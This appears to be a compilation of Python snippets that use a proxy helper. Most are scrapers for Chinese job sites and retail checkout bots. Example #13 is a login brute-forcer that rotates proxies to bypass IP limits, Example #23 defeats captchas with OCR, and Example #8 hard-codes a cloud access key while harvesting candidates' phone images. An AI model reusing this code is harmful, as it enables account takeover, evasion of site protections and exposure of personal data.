Example #1
def next_html(account_cookies, data, retry):
    logger.info('开始进行下一页 %s %s' % (
        account_cookies.get('userName', ''),
        retry,
    ))
    global proxy
    if retry <= 0:
        return None
    cookie = account_cookies.get('cookie')
    headers = arouse_utils.get_get_headers()
    url = 'http://ehire.51job.com/Candidate/SearchResumeNew.aspx'
    logger.info(proxy)

    result = utils.download(url=url,
                            data=data,
                            proxy=proxy,
                            cookie=cookie,
                            headers=headers,
                            method='post')

    if result['code'] != 0:
        logger.error("连接页面异常 ,重试: retry= %s" % retry)
        proxy = utils.get_proxy()
        return next_html(account_cookies, data, retry - 1)
    elif '用户数不够' in result['data'] or len(result['data']) < 1000:
        logger.error("代理异常,重试: retry= %s" % retry)
        proxy = utils.get_proxy()
        return next_html(account_cookies, data, retry - 1)
    if '您的操作过于频繁,请注意劳逸结合' in result['data']:
        return None
    return result['data']
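The recursive "rotate the proxy and retry" pattern above can also be written as a plain loop. The sketch below is a self-contained approximation, not the original utils module: fetch_proxy is a hypothetical stand-in for utils.get_proxy(), and the blank-page heuristic mirrors the len(result['data']) < 1000 check from the example.

# Hedged sketch: iterative retry with proxy rotation (assumes a fetch_proxy()
# callable that returns a requests-style proxies dict).
import requests

def fetch_with_retry(url, data, fetch_proxy, retries=3, timeout=10):
    proxy = fetch_proxy()
    for _ in range(retries):
        try:
            resp = requests.post(url, data=data, proxies=proxy, timeout=timeout)
        except requests.RequestException:
            proxy = fetch_proxy()  # network error: rotate the proxy and retry
            continue
        if resp.status_code != 200 or len(resp.text) < 1000:
            proxy = fetch_proxy()  # banned proxy or blank page: rotate and retry
            continue
        return resp.text
    return None  # all attempts exhausted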
Example #2
def go_to_search_html(cookie, retry):
    global proxy
    if retry <= 0:
        return None
    logger.info('跳转搜索前置页面中------%s ' % retry)
    url = 'http://ehire.51job.com/Candidate/SearchResumeIndexNew.aspx'
    headers = arouse_utils.get_get_headers(
        'http://ehire.51job.com/Navigate.aspx')
    if not proxy:
        proxy = utils.get_proxy()
    logger.info(proxy)
    utils_download = utils.download(url=url,
                                    headers=headers,
                                    proxy=proxy,
                                    cookie=cookie)

    if utils_download['code'] != 0:
        logger.error('搜索页面出错:%s %s' % (url, retry))
        if utils_download.get(
                'data'
        ) and '<a href="/MainLogin.aspx?returl=' in utils_download['data']:
            return 'login'
        proxy = utils.get_proxy()
        return go_to_search_html(cookie, retry - 1)

    if '<a href="/MainLogin.aspx?returl=' in utils_download['data']:
        return 'login'
    viewstate = arouse_utils.find(
        '<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="(.*?)" />',
        utils_download['data'])
    if not viewstate:
        proxy = utils.get_proxy()
        return go_to_search_html(cookie, retry - 1)
    return viewstate
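The __VIEWSTATE lookup above goes through arouse_utils.find; a standard-library equivalent of just that extraction step (the regex is copied from the example) would look like this:

# Hedged sketch: extract __VIEWSTATE with the same regex, standard library only.
import re

VIEWSTATE_RE = re.compile(
    r'<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="(.*?)" />')

def extract_viewstate(html):
    match = VIEWSTATE_RE.search(html)
    return match.group(1) if match else None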
Example #3
def go_to_list_html(param, cookie, viewstate, retry):
    global proxy
    logger.info('搜索前置页面-开始初始搜索------ %s' % retry)
    if retry <= 0:
        return None
    url = 'http://ehire.51job.com/Candidate/SearchResumeNew.aspx'
    # param = {"function_code": "0107", "functionName": "软件工程师", "region_code": "010000",
    #          "regionName": "北京"}
    data = arouse_utils.get_frist_post_headers(viewstate, param=param)

    logger.info(proxy)
    result = utils.download(url=url,
                            data=data,
                            proxy=proxy,
                            cookie=cookie,
                            method='post')
    if result['code'] != 0:
        logger.error("连接页面异常 ,重试: retry= %s" % retry)
        proxy = utils.get_proxy()
        return go_to_list_html(param, cookie, viewstate, retry - 1)
    elif '用户数不够' in result['data'] or len(result['data']) < 1000:
        logger.error("代理异常,重试: retry= %s" % retry)
        proxy = utils.get_proxy()
        return go_to_list_html(param, cookie, viewstate, retry - 1)
    if '您的操作过于频繁,请注意劳逸结合' in result['data']:
        return None
    return result['data']
Example #4
def refer_list_html(account, data, retry):
    """
    刷新下一页
    :param resume_ids:
    :param retry:
    :return: 刷新后的列表页面
    """
    global proxy
    if retry <= 0:
        return None
    headers = inbox_utils.get_headers(
        'http://ehire.51job.com/Inbox/InboxRecentEngine.aspx?Style=1')
    headers['Cookie'] = account['cookies']
    proxy = common_utils.get_proxy()
    url = 'http://ehire.51job.com/Inbox/InboxRecentEngine.aspx?Style=1'
    r = common_utils.download(url=url,
                              headers=headers,
                              data=data,
                              method='post',
                              cookie=account['cookie'],
                              proxy=proxy)

    if r.get('code') != 0:
        logger.error("列表页面返回不正常 %s" % r.get('data'))
        if r.get('data') and '<a href="/MainLogin.aspx?returl=' in r['data']:
            return 'login'
        proxy = common_utils.get_proxy()
        return refer_list_html(account, data, retry - 1)

    if '<a href="/MainLogin.aspx?returl=' in r['data']:
        return 'login'

    return r.get('data')
Example #5
    def run(self):
        profile, proxy = get_profile(self.profile), get_proxy(self.proxies)
        if profile is None:
            self.status_signal.emit({
                "msg": "Invalid profile",
                "status": "error"
            })
            return
        if proxy is None:
            self.status_signal.emit({
                "msg": "Invalid proxy list",
                "status": "error"
            })
            return
        if self.site == "Walmart":
            Walmart(self.task_id, self.status_signal, self.image_signal,
                    self.product, profile, proxy, self.monitor_delay,
                    self.error_delay, self.max_price)
        elif self.site == "Bestbuy":
            BestBuy(self.task_id, self.status_signal, self.image_signal,
                    self.product, profile, proxy, self.monitor_delay,
                    self.error_delay)
        elif self.site == "Target":
            Target(self.task_id, self.status_signal, self.image_signal,
                   self.product, profile, proxy, self.monitor_delay,
                   self.error_delay)
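The if/elif chain above grows with every supported site; a dictionary dispatch is one hedged alternative. Walmart, BestBuy and Target below refer to the same bot classes the original module imports, and the constructor arguments are assumed to match the example.

# Hedged sketch: map site names to the bot classes used above instead of an
# if/elif chain (assumes the same constructors as in the example).
SITE_BOTS = {
    "Walmart": Walmart,
    "Bestbuy": BestBuy,
    "Target": Target,
}

def start_bot(site, *args, **kwargs):
    bot_cls = SITE_BOTS.get(site)
    if bot_cls is None:
        raise ValueError("Unsupported site: %s" % site)
    return bot_cls(*args, **kwargs)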
Example #6
def conn_html(account, url, retry, refer_url=None, track_id=None):
    """
    连接搜索列表
    :return:
    """
    global proxy
    logger.info("开始连接 %s , 重试次数 %s" % (url, retry))
    if retry <= 0:
        return None
    headers = inbox_utils.get_headers(refer_url)
    # headers['Cookie'] = account['cookie']
    # r = requests.get(url, headers=headers, timeout=10)
    r = common_utils.download(url=url,
                              headers=headers,
                              cookie=account['cookie'],
                              proxy=proxy)

    if r.get("code") != 0:
        logger.error("列表页面返回不正常 data= %s" % r.get('data'))
        if r.get('data') and '<a href="/MainLogin.aspx?returl=' in r['data']:
            return 'login'
        proxy = common_utils.get_proxy()
        return conn_html(account, url, retry - 1, refer_url, track_id)
    if '<a href="/MainLogin.aspx?returl=' in r['data']:
        return 'login'

    return r.get('data')
Example #7
    def run(self):
        profile, proxy = get_profile(self.profile), get_proxy(self.proxies)
        if profile is None:
            self.status_signal.emit({
                "msg": "Invalid profile",
                "status": "error"
            })
            return
        if proxy is None:
            self.status_signal.emit({
                "msg": "Invalid proxy list",
                "status": "error"
            })
            return
        if self.site == "Walmart":
            Walmart(self.task_id, self.status_signal, self.image_signal,
                    self.wait_poll_signal, self.wait_condition, self.product,
                    profile, proxy, self.monitor_delay, self.error_delay,
                    self.max_price)
        elif self.site == "Bestbuy":
            BestBuy(self.status_signal, self.image_signal, self.product,
                    profile, proxy, self.monitor_delay,
                    self.error_delay)  # TODO: Re-add Discord Webhook
        elif self.site == "Target":
            Target(self.task_id, self.status_signal, self.image_signal,
                   self.product, profile, proxy, self.monitor_delay,
                   self.error_delay)
        elif self.site == "GameStop":
            GameStop(self.task_id, self.status_signal, self.image_signal,
                     self.product, profile, proxy, self.monitor_delay,
                     self.error_delay, self.max_price)
Example #8
def save_mobile_imgs_to_oss(img_url, retry, trackId, headers=None):
    """
    连接获取电话图片保存oss
    :return:
    """
    logger = common_utils.get_logger()
    logger.error("准备连接电话图片: %s" % trackId)
    if retry <= 0:
        return None
    try:
        r = requests.get(img_url, proxies=common_utils.get_proxy(), timeout=8)
    except Exception as e:
        logger.error(e)
        logger.error("连接电话图片异常: %s 重试" % trackId)
        return save_mobile_imgs_to_oss(img_url, retry - 1, trackId)

    # 存储oss
    logger.error("准备存储oss: %s " % trackId)
    auth = oss2.Auth('LTAIa3y58SBV0Kyn', 'yBZcBKhQTgtf4cV55ljpnNCSk1XWaI')
    bucket = oss2.Bucket(auth, 'http://oss-cn-beijing.aliyuncs.com', 'ocr-img')
    # oss_api = OssAPI('http://oss-cn-beijing.aliyuncs.com', 'LTAIa3y58SBV0Kyn', 'yBZcBKhQTgtf4cV55ljpnNCSk1XWaI')
    oss_addr = 'spider/FIVE_ONE/RESUME_INBOX/' + str(uuid.uuid1()) + '.jpg'
    try:
        # oss_api.put_object('ocr-img', r, oss_addr)
        bucket.put_object(oss_addr, r.content)  # upload the image bytes, not the Response object
    except Exception as e:
        logger.error(traceback.format_exc())
        return save_mobile_imgs_to_oss(img_url, retry - 1, trackId)

    return oss_addr
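The example above hard-codes the OSS AccessKey pair. Below is a hedged variant of the same upload step that reads the credentials from environment variables (OSS_ACCESS_KEY_ID / OSS_ACCESS_KEY_SECRET are placeholder names) and uploads the downloaded image bytes; endpoint, bucket and key layout are copied from the example.

# Hedged sketch: same OSS endpoint, bucket and key prefix as above, but with
# credentials taken from the environment.
import os
import uuid

import oss2
import requests

def upload_image_to_oss(img_url, timeout=8):
    resp = requests.get(img_url, timeout=timeout)
    resp.raise_for_status()
    auth = oss2.Auth(os.environ["OSS_ACCESS_KEY_ID"],
                     os.environ["OSS_ACCESS_KEY_SECRET"])
    bucket = oss2.Bucket(auth, "http://oss-cn-beijing.aliyuncs.com", "ocr-img")
    key = "spider/FIVE_ONE/RESUME_INBOX/" + str(uuid.uuid1()) + ".jpg"
    bucket.put_object(key, resp.content)  # upload the raw image bytes
    return key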
Example #9
def get_page(url):
    utils.get_logger().info('get_page url %s' % url)
    for x in xrange(3):
        try:
            proxy = utils.get_proxy()
            utils.get_logger().error('get_page[use proxy %s]' % proxy)
            session = requests.session()
            content = session.get(url, headers={
                'Connection': 'keep-alive',
                'Upgrade-Insecure-Requests': '1',
                'User-Agent': 'Mozilla/5.0(Windows NT 10.0; WOW64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
                'Accept': 'text/html, application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
                'Accept-Encoding': 'gzip, deflate, sdch',
                'Accept-Language': 'zh-CN,zh;q=0.8',
            }, proxies=proxy, timeout=10).content
            if content:
                utils.get_logger().info('[the page use proxy %s] ' % proxy)
                if '验证码' in content:
                    utils.get_logger().info('[the page needs input validate code %s]' % url)
                else:
                    return {'content': content, 'proxy': proxy}
            else:
                utils.get_logger().info('[request returns null page %s]' % url)
        except Exception as e:
            utils.get_logger().error(str(traceback.format_exc()))

    return None
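This example targets Python 2 (xrange, byte strings), so the '验证码' substring test works directly on the raw page bytes. Under Python 3, response content is bytes and has to be decoded first; a minimal sketch of the same check (the UTF-8 encoding is an assumption):

# Hedged sketch: the captcha-marker check under Python 3, where the body must
# be decoded before a substring test.
import requests

def page_needs_captcha(url, proxies=None, timeout=10):
    resp = requests.get(url, proxies=proxies, timeout=timeout)
    text = resp.content.decode("utf-8", errors="replace")
    return "验证码" in text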
Example #10
def start_one_job(account):
    """开启一个帐号的任务
    :account dict : 帐号,含有cookie
    """
    global proxy
    track_id = str(uuid.uuid1())
    url = "http://ehire.51job.com/Inbox/InboxRecentEngine.aspx?Style=1"
    refer_url = "http://ehire.51job.com/Navigate.aspx?ShowTips=11&PwdComplexity=N"
    proxy = common_utils.get_proxy()
    list_html = conn_html(account,
                          url,
                          5,
                          refer_url=refer_url,
                          track_id=track_id)
    # list_html = open('text_htl').read()  # 测试
    while True:
        if list_html:
            if 'login' == list_html:
                # 需要登录
                logger.error("出现登录页面 %s" % account['userName'])
                return 'login'
            else:
                hidEngineCvlogIds = common_utils.find(
                    '<input name="hidEngineCvlogIds" type="hidden" id="hidEngineCvlogIds" value="(.*?)" />',
                    list_html)
                __VIEWSTATE = common_utils.find(
                    '<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="(.*?)" />',
                    list_html)
                resume_ids = parse_list_html(list_html, track_id=track_id)
                if 'none' == resume_ids:
                    logger.info("邮箱没有邮件了--%s" % account['userName'])
                    return 'over'
                elif 'refer-login' == resume_ids:
                    logger.error("出现登录页面 %s" % account['userName'])
                    return 'login'

                if resume_ids:
                    ids_for = list(resume_ids)
                    logger.info('简历个数: %s' % len(resume_ids))
                    for id in ids_for:
                        info_url = 'http://ehire.51job.com/Candidate/ResumeViewFolder.aspx?hidSeqID=%s&hidFolder=EMP' % id
                        flag = info_main(account, info_url, track_id)
                        # flag = True
                        if 'login' == flag:
                            logger.error("出现登录页面 %s" % account['userName'])
                            return 'login'
                        if not flag:  # 失败?
                            resume_ids.remove(id)

                    # 测试
                    # resume_ids = ['9229836941', ]
                    data = get_refer_data(resume_ids, __VIEWSTATE,
                                          hidEngineCvlogIds)
                    list_html = refer_list_html(account, data, 4)  # refresh the list for the next loop iteration
                else:  # 解析失败
                    logger.error("页面 未能解析出简历%s" % account['userName'])
                    return 'error'
        else:  # 解析失败
            logger.error("出现错误页面 %s" % account['userName'])
            return 'error'
Example #11
def get_page(url, header):
    logger.info('get_page url %s' % url)
    for x in xrange(3):
        try:
            proxy = utils.get_proxy()
            logger.info('get_page[use proxy %s]' % proxy)
            session = requests.session()
            content = session.get(url,
                                  headers=header,
                                  proxies=proxy,
                                  timeout=10).content
            if content:
                logger.info('[the page use proxy %s] ' % proxy)
                if '验证码' in content or '机器人' in content:
                    logger.info('[the page needs input validate code %s]' %
                                url)
                    return None
                else:
                    return {'content': content, 'proxy': proxy}
            else:
                logger.info('[request returns null page %s]' % url)
        except Exception as e:
            logger.error(str(traceback.format_exc()))

    return None
Example #12
def get_list(city=None, zone=None, money=None, education=None, experience=None, size=None, page_now=None, is_get_zone=None, proxy=None, jobtitle=None, **kwargs):
    logger = utils.get_logger()
    
    proxy = proxy if proxy else utils.get_proxy()
    # proxy = utils.get_proxy()
    
    # logger.info('split_list_thread start!!!')
    result = {'code': 0}
    # list_url = 'http://www.zhipin.com/%s/e_105-d_203-s_302-y_4-b_%E6%9C%9D%E9%98%B3%E5%8C%BA/?page=%s&ka=page-next'
    city_param = 'c' + str(city)
    zone_param =  'b_' + str(zone) if zone else ''
    # industry_param = 'i'+str(industry)+'-' if industry else ''
    jobtitle_param = '-p'+str(jobtitle) if jobtitle else ''
    money_param = 'y_'+str(money)+'-' if money else ''
    education_param = 'd_'+str(education)+'-' if education else ''
    experience_param = 'e_'+str(experience)+'-' if experience else ''
    size_param = 's_'+str(size)+'-' if size else ''
    # list_url = 'http://www.zhipin.com/%s/?page=%s' % (city, page_now)
    if experience_param or education_param or size_param or money_param or zone_param:
        list_url = 'http://www.zhipin.com/'+city_param+jobtitle_param+'/'+experience_param+education_param+size_param+money_param+zone_param+'/?page='+str(page_now)+'&ka=page-next'
    else:
        list_url = 'http://www.zhipin.com/'+city_param+jobtitle_param+'/?page='+str(page_now)+'&ka=page-next'
    logger.info('the url, proxy is'+list_url+'    '+str(proxy))
    # time.sleep(2)
    list_header = {
        'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Encoding':'gzip, deflate, sdch',
        'Accept-Language':'zh-CN,zh;q=0.8',
        'Host':'www.zhipin.com',
        'Upgrade-Insecure-Requests':'1',
        'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
    }
    while True:
        logger.info('download url:'+list_url)
        try:
            response = requests.get(list_url, headers=list_header, allow_redirects=False, proxies=proxy, timeout=10)
            if response.status_code in [200, '200']:
                if len(response.text) < 1024:
                    logger.info('get '+response.text)
                else:
                    break
            else:
                logger.info('not get 200 when download list!!!'+ str(response.status_code))
                # result['code']=1
        except Exception, e:
            logger.info(str(traceback.format_exc()))
        proxy.update(utils.get_proxy())
Example #13
def login_bypass_ip_limit():
    """
    针对限制了ip访问次数的登录进行爆破
    :return:
    """
    # 开始登录
    global CUR_PROXY
    try:
        login_info = dict_queue.get(block=False)
    except:
        return

    username = login_info[0]
    # 如果这个用户名已经被爆破出来密码,那么跳过这个用户名
    if username in success_username:
        return

    password = login_info[1]

    payload = {
        "username": username,
        "password": password,
    }
    print('开始尝试用户名:{},密码:{}'.format(username, password))

    S = requests.Session()
    while True:
        try:
            response = S.post(settings.LOGIN_LIMIT_IP_URL,
                              data=payload,
                              proxies=CUR_PROXY,
                              timeout=5)
            if response.status_code == 200:
                # 正常获取到了服务器请求
                soup = BeautifulSoup(response.text, 'lxml')
                if soup.find('span', text='对不起,您的访问过于频繁,请等待60秒后再操作!'):
                    # 捕获到了限制信息,改用代理登录
                    print("被限制了")
                    CUR_PROXY = utils.get_proxy()
                    print("当前使用代理:{}".format(CUR_PROXY))
                    continue

                elif soup.find('a', attrs={'id': 'backdoor'}):
                    # 用户名密码正确,成功登录
                    success_queue.put(payload)
                    success_username.append(username)
                    print('【爆破成功,用户名:{},密码:{}】'.format(username, password))
                    # stop_brute()
                    return True

                elif soup.find('span', text='用户名或密码错误!'):
                    # print("用户名或密码错误")
                    return False
                else:
                    pass
            else:
                print("连接异常")
        except Exception as e:
            print(e)
Example #14
    def __init__(self):
        self.twitterTokens = get_tokens()

        http_proxy, https_proxy = get_proxy()

        self.api = twitter.Api(consumer_key=self.twitterTokens['consumer_key'],
                               consumer_secret=self.twitterTokens['consumer_secret'],
                               access_token_key=self.twitterTokens['access_token'],
                               access_token_secret=self.twitterTokens['access_token_secret'],
                               proxies={'http': http_proxy, 'https': https_proxy})
Example #15
def get_detail_html(url):
    for i in range(5):
        try:
            response = requests.get(url, headers=headers, proxies=get_proxy())
            if response.status_code == 200:
                response.encoding = "gbk"
                print("当前运行url为-{}".format(url))
                return response.text
        except:
            pass
Example #16
def get_page(url, header, proxy=None):
    logger.info('get_page url %s' % url)
    for x in xrange(4):
        try:
            if not proxy:
                proxy = utils.get_proxy()
            logger.info('get_page[use proxy %s]' % proxy)
            session = requests.session()
            content = session.get(url=url,
                                  headers=header,
                                  proxies=proxy,
                                  timeout=5).content
            if content:
                logger.info('[the page use proxy %s] ' % proxy)
                return {'content': content, 'proxy': proxy}
            else:
                logger.info('[request returns null page %s]' % url)

        except Exception as e:
            logger.error(str(traceback.format_exc()))
            proxy = utils.get_proxy()
    return None
Example #17
def process(task):
    """
        根据一个搜索条件开始一项搜索
        :return:
        """
    global logger
    if project_settings.get('useAby'):
        getproxies_ = project_settings.get('aby')
    else:
        getproxies_ = utils.get_proxy()
    logger = utils.get_logger()
    param_dict = json.loads(task['data'][0]['executeParam'], encoding="utf-8")

    result = {'code': 0}
    track_id = str(uuid.uuid1())

    page_num = 1
    if param_dict['page_num']:
        page_num = param_dict['page_num']
    while True:
        url = get_list_url(param_dict, page_num)

        list_html_list = get_html(url, 5, track_id, getproxies_)
        if list_html_list:
            logger.info("list_html success when download: " + url)
            info_list = parse_list_html(list_html_list[0], track_id, page_num)
        else:
            # 页面不正常
            logger.error(u"列表页面获取失败: url=%s" % url)
            param_dict['page_num'] = page_num
            result['executeResult'] = 'list_html_error'
            result['executeParam'] = json.dumps(param_dict,
                                                ensure_ascii=False).encode()
            result['code'] = 1
            return result

        if 'none_jd' == info_list:
            # 抓取完了
            logger.info("此搜索条件无新职位可用: url=%s" % url)
            logger.info('没有符合条件的职位 %s' % json.dumps(param_dict))
            result['executeResult'] = u'正常完毕'
            return result
        else:
            for info in info_list:
                try:
                    info_mian(param_dict, info, track_id, getproxies_)
                except Exception, e:
                    logger.error(traceback.format_exc())

        page_num += 1
Example #18
def get_detail_html(url):
    # url = "http://www.chinacar.com.cn/serv/list_0_0_0_0_{}.html".format(page)
    for i in range(5):
        try:
            response = requests.get(url,
                                    headers=headers,
                                    stream=True,
                                    proxies=get_proxy(),
                                    timeout=10)
            if response.status_code == 200:
                print("当前运行url为-{}".format(url))
                # print("ip=======", response.raw._connection.sock.getpeername())
                return response.text
        except:
            pass
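stream=True above keeps the connection open until the body is read, which is what makes the commented-out peer-address check possible. A hedged sketch of that check follows; raw._connection is the private urllib3 detail referenced in the example's comment and may change between requests/urllib3 versions.

# Hedged sketch: inspect which peer actually served the request, then read the
# body (reading the body closes the stream).
import requests

def fetch_and_log_peer(url, headers=None, proxies=None, timeout=10):
    resp = requests.get(url, headers=headers, stream=True,
                        proxies=proxies, timeout=timeout)
    peer = resp.raw._connection.sock.getpeername()  # (ip, port) of the peer
    return peer, resp.text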
Example #19
def start():
    if conf.psyco:
        try:
            import psyco
            psyco.full()
            logger.critical("Enabling psyco support.")
        except:
            logger.critical(
                "Looks like psyco is not installed in your system. Psyco acceleration will not be enabled."
            )
            pass
    if conf.http_proxy:
        try:
            conf.http_proxy = utils.get_proxy(conf.http_proxy)
        except:
            logger.critical(
                "Invalid format of HTTP-proxy. No proxy will be used.")
            conf.http_proxy = None
    logger.critical("Starting the caching resolver in a separate thread.")
    resolver.start(['mrim.mail.ru', 'avt.foto.mail.ru'])
    while 1:
        try:
            xmpp_con = transport.XMPPTransport(conf.name, conf.disconame,
                                               conf.server, conf.port,
                                               conf.passwd, logger)
            logger.critical("Connecting to XMPP server")
            xmpp_con.run()
        except KeyboardInterrupt:
            logger.critical('Got SIGINT, closing connections')
            xmpp_con.stop()
            try:
                os.unlink(conf.pidfile)
            except OSError:
                pass
            logger.critical('Shutdown')
            break
        except:
            traceback.print_exc()
            logger.critical("Connection to server lost")
            logger.critical("Trying to reconnect over 5 seconds")
            try:
                xmpp_con.stop(notify=False)
                del xmpp_con
            except:
                traceback.print_exc()
                pass
            time.sleep(5)
Example #20
    def run(self):
        profile, proxy = get_profile(self.profile), get_proxy(self.proxies)
        if profile is None:
            self.status_signal.emit({
                "msg": "Invalid profile",
                "status": "error"
            })
            return
        if proxy is None:
            self.status_signal.emit({
                "msg": "Invalid proxy list",
                "status": "error"
            })
            return

        if self.site == "Bestbuy":
            BestBuy(self.status_signal, self.image_signal, self.product,
                    profile, proxy, self.monitor_delay, self.error_delay)
Example #21
def get_topology_by_rg(helper, access_token, subscription_id, api_version,
                       resourceGroupName, networkWatcherName,
                       targetResourceGroupName):
    url = "https://management.azure.com/subscriptions/%s/resourceGroups/%s/providers/Microsoft.Network/networkWatchers/%s/topology?api-version=%s" % (
        subscription_id, resourceGroupName, networkWatcherName, api_version)
    header = {'Authorization': 'Bearer ' + access_token}
    proxies = utils.get_proxy(helper, "requests")

    try:
        r = requests.post(
            url,
            headers=header,
            proxies=proxies,
            json={'targetResourceGroupName': targetResourceGroupName})
        r.raise_for_status()
        topology = json.loads(r.text)
    except Exception, e:
        raise e
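The portion shown above parses the topology response but never returns it. A hedged sketch of the same Network Watcher call that returns the parsed JSON; the URL format, Authorization header and request payload are copied from the example.

# Hedged sketch: Azure Network Watcher topology call that returns the result.
import requests

def get_topology(access_token, subscription_id, api_version,
                 resource_group, network_watcher, target_resource_group,
                 proxies=None):
    url = ("https://management.azure.com/subscriptions/%s/resourceGroups/%s/"
           "providers/Microsoft.Network/networkWatchers/%s/topology?api-version=%s"
           % (subscription_id, resource_group, network_watcher, api_version))
    headers = {"Authorization": "Bearer " + access_token}
    resp = requests.post(url, headers=headers, proxies=proxies,
                         json={"targetResourceGroupName": target_resource_group})
    resp.raise_for_status()
    return resp.json()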
Example #22
File: init.py Project: zinid/mrim
def start():
    if conf.psyco:
        try:
            import psyco

            psyco.full()
            logger.critical("Enabling psyco support.")
        except:
            logger.critical("Looks like psyco is not installed in your system. Psyco acceleration will not be enabled.")
            pass
    if conf.http_proxy:
        try:
            conf.http_proxy = utils.get_proxy(conf.http_proxy)
        except:
            logger.critical("Invalid format of HTTP-proxy. No proxy will be used.")
            conf.http_proxy = None
    logger.critical("Starting the caching resolver in a separate thread.")
    resolver.start(["mrim.mail.ru", "avt.foto.mail.ru"])
    while 1:
        try:
            xmpp_con = transport.XMPPTransport(conf.name, conf.disconame, conf.server, conf.port, conf.passwd, logger)
            logger.critical("Connecting to XMPP server")
            xmpp_con.run()
        except KeyboardInterrupt:
            logger.critical("Got SIGINT, closing connections")
            xmpp_con.stop()
            try:
                os.unlink(conf.pidfile)
            except OSError:
                pass
            logger.critical("Shutdown")
            break
        except:
            traceback.print_exc()
            logger.critical("Connection to server lost")
            logger.critical("Trying to reconnect over 5 seconds")
            try:
                xmpp_con.stop(notify=False)
                del xmpp_con
            except:
                traceback.print_exc()
                pass
            time.sleep(5)
Example #23
    def get_verifycode(self, client=object, imageUrl=''):

        # 填写自己的 baidu-ocr api信息
        APP_ID = 'xxxxxxxxxx'
        API_KEY = 'xxxxxxxxxxxx'
        SECRET_KEY = 'xxxxxxxxxxxxxxx'

        options = {}
        options["recognize_granularity"] = "big"
        options["detect_direction"] = "true"

        client = AipOcr(APP_ID, API_KEY, SECRET_KEY)
        retry_times = 3
        i = 0
        while i < retry_times:
            i += 1
            try:
                # image = get_file_content(tmpImageName)
                image = self.sess.get(imageUrl, proxies=utils.get_proxy(),
                                      headers=self.a_task.M_HEADERS,
                                      cookies=self.a_task.M_COOKIES,
                                      verify=False)
                # open('vc____.jpg', 'wb').write(image.content)
                response = client.numbers(image.content, options)
                debug_p('[get_verifycode] vc_code response=', response)
                # dict: {'log_id': 3705378724129786481, 'direction': 0, 'words_result_num': 1, 'words_result': [{'location': {'width': 78, 'top': 1, 'left': 13, 'height': 37}, 'words': '4217'}]}
                words_result = response['words_result']
                verifycode = words_result[0].get('words', '')
                if not verifycode or len(verifycode) < 4:
                    continue
                if len(verifycode) > 4:
                    verifycode = verifycode[:4]
                debug_p('[get_verifycode] verifycode=', verifycode, 'i=', i)
                return verifycode
            except Exception as e:
                # speed up
                i += 1
                debug_p('[get_verifycode] Exception', 'i=', i, 'traceback=', traceback.format_exc())
                pass
        return '0000'
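The OCR step above boils down to a single AipOcr.numbers call. A stripped-down sketch of just that step (the credentials are placeholders and the options mirror the example):

# Hedged sketch: digit recognition with baidu-aip, as used above.
from aip import AipOcr

def ocr_digits(image_bytes, app_id, api_key, secret_key):
    client = AipOcr(app_id, api_key, secret_key)
    options = {"recognize_granularity": "big", "detect_direction": "true"}
    result = client.numbers(image_bytes, options)
    words = result.get("words_result", [])
    return words[0].get("words", "") if words else ""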
Example #24
def download_page(url=None, method=None, header=None, refer=None, proxy=None):
    logger = utils.get_logger()
    result = {}
    # if not header:
    header = {
        'Connection': 'keep-alive',
        'Upgrade-Insecure-Requests': '1',
        'User-Agent':
        'Mozilla/5.0(Windows NT 10.0; WOW64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Accept':
        'text/html, application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Encoding': 'gzip, deflate, sdch',
        'Accept-Language': 'zh-CN,zh;q=0.8',
        'Cookie': 'ZP_OLD_FLAG=true;'
    }
    if refer:
        header['Referer'] = refer
    for x in xrange(0, 3):
        # proxy = utils.get_proxy()
        if project_settings.get('useAby'):
            proxy = project_settings.get('aby')
        else:
            proxy = utils.get_proxy()
        logger.info('download_page : %s ' % url)

        result = utils.download(url=url,
                                headers=header,
                                method=method,
                                allow_redirects=True,
                                retry_time=1,
                                proxy=proxy)
        print result
        if result['code'] == 0:
            logger.info('success when download %s-%s ' % (proxy, url))
            break
        time.sleep(1)

    result['proxy'] = ''
    return result
Example #25
def _transfer_test():
    PROXY_INDEX = 0

    # Session Transfer Testing
    proxy, proxy_auth = get_proxy(PROXY_INDEX)
    service_args = [
        '--proxy={}'.format(proxy), '--proxy-type=http',
        '--ignore-ssl-errors=true'
    ]
    if proxy_auth:
        service_args.append('--proxy-auth={}'.format(proxy_auth))

    driver = webdriver.PhantomJS(executable_path=PHANTOM_JS_LOCATION,
                                 service_args=service_args)
    add_to_cart(driver, cc='US')

    # Test transferring session (go to ipecho.net to see ip, got to cart to see if in cart)
    transfer_session(driver,
                     proxy,
                     proxy_auth,
                     user_agent=get_user_agent(PROXY_INDEX))

    time.sleep(60 * 60)
Example #26
def parse_list(data):
    logger = utils.get_logger()
    # url = data['url']
    city_url = data['cityUrl']
    page_num = data['pageNum']
    flg = True
    while flg:
        url = build_page_url(data=data, page_num=page_num)
        logger.info('请求列表页 url : %s' % (url, ))
        if project_settings.get('useAby'):
            proxy = project_settings.get('aby')
        else:
            proxy = utils.get_proxy()
        results = download_page(url=url, method='get', proxy=proxy)
        proxy = results['proxy']
        content = results['data']
        if '暂时无符合您条件的职位' in content or '没有符合您要求的职位' in content:
            logger.info('没有符合条件的职位 %s' % json.dumps(data, ensure_ascii=False))
            data['code'] = 200
            flg = True
            break
        if '您要访问的页面暂时没有找到' in content:
            logger.info('页面没有找到,返回404 %s ' % url)
            data['code'] = 200
            flg = True
            break
        if 'jobs.zhaopin.com' in city_url:
            flg = parse_list_v1(page=content,
                                page_num=page_num,
                                data=data,
                                refer=url,
                                proxy=proxy)
        else:
            flg = parse_list_v2(page=content,
                                page_num=page_num,
                                data=data,
                                refer=url,
                                proxy=proxy)

        # 有解析到正常数据
        logger.info('解析列表页详情数据 返回结果 %s' %
                    (json.dumps(flg, ensure_ascii=False)))
        if flg.has_key('status') and flg.get('status'):
            data['code'] = 200
            if flg.has_key('detail_count') and flg.get('detail_count') > 0:
                page_num += 1
            else:
                data['code'] = 200
                flg = False
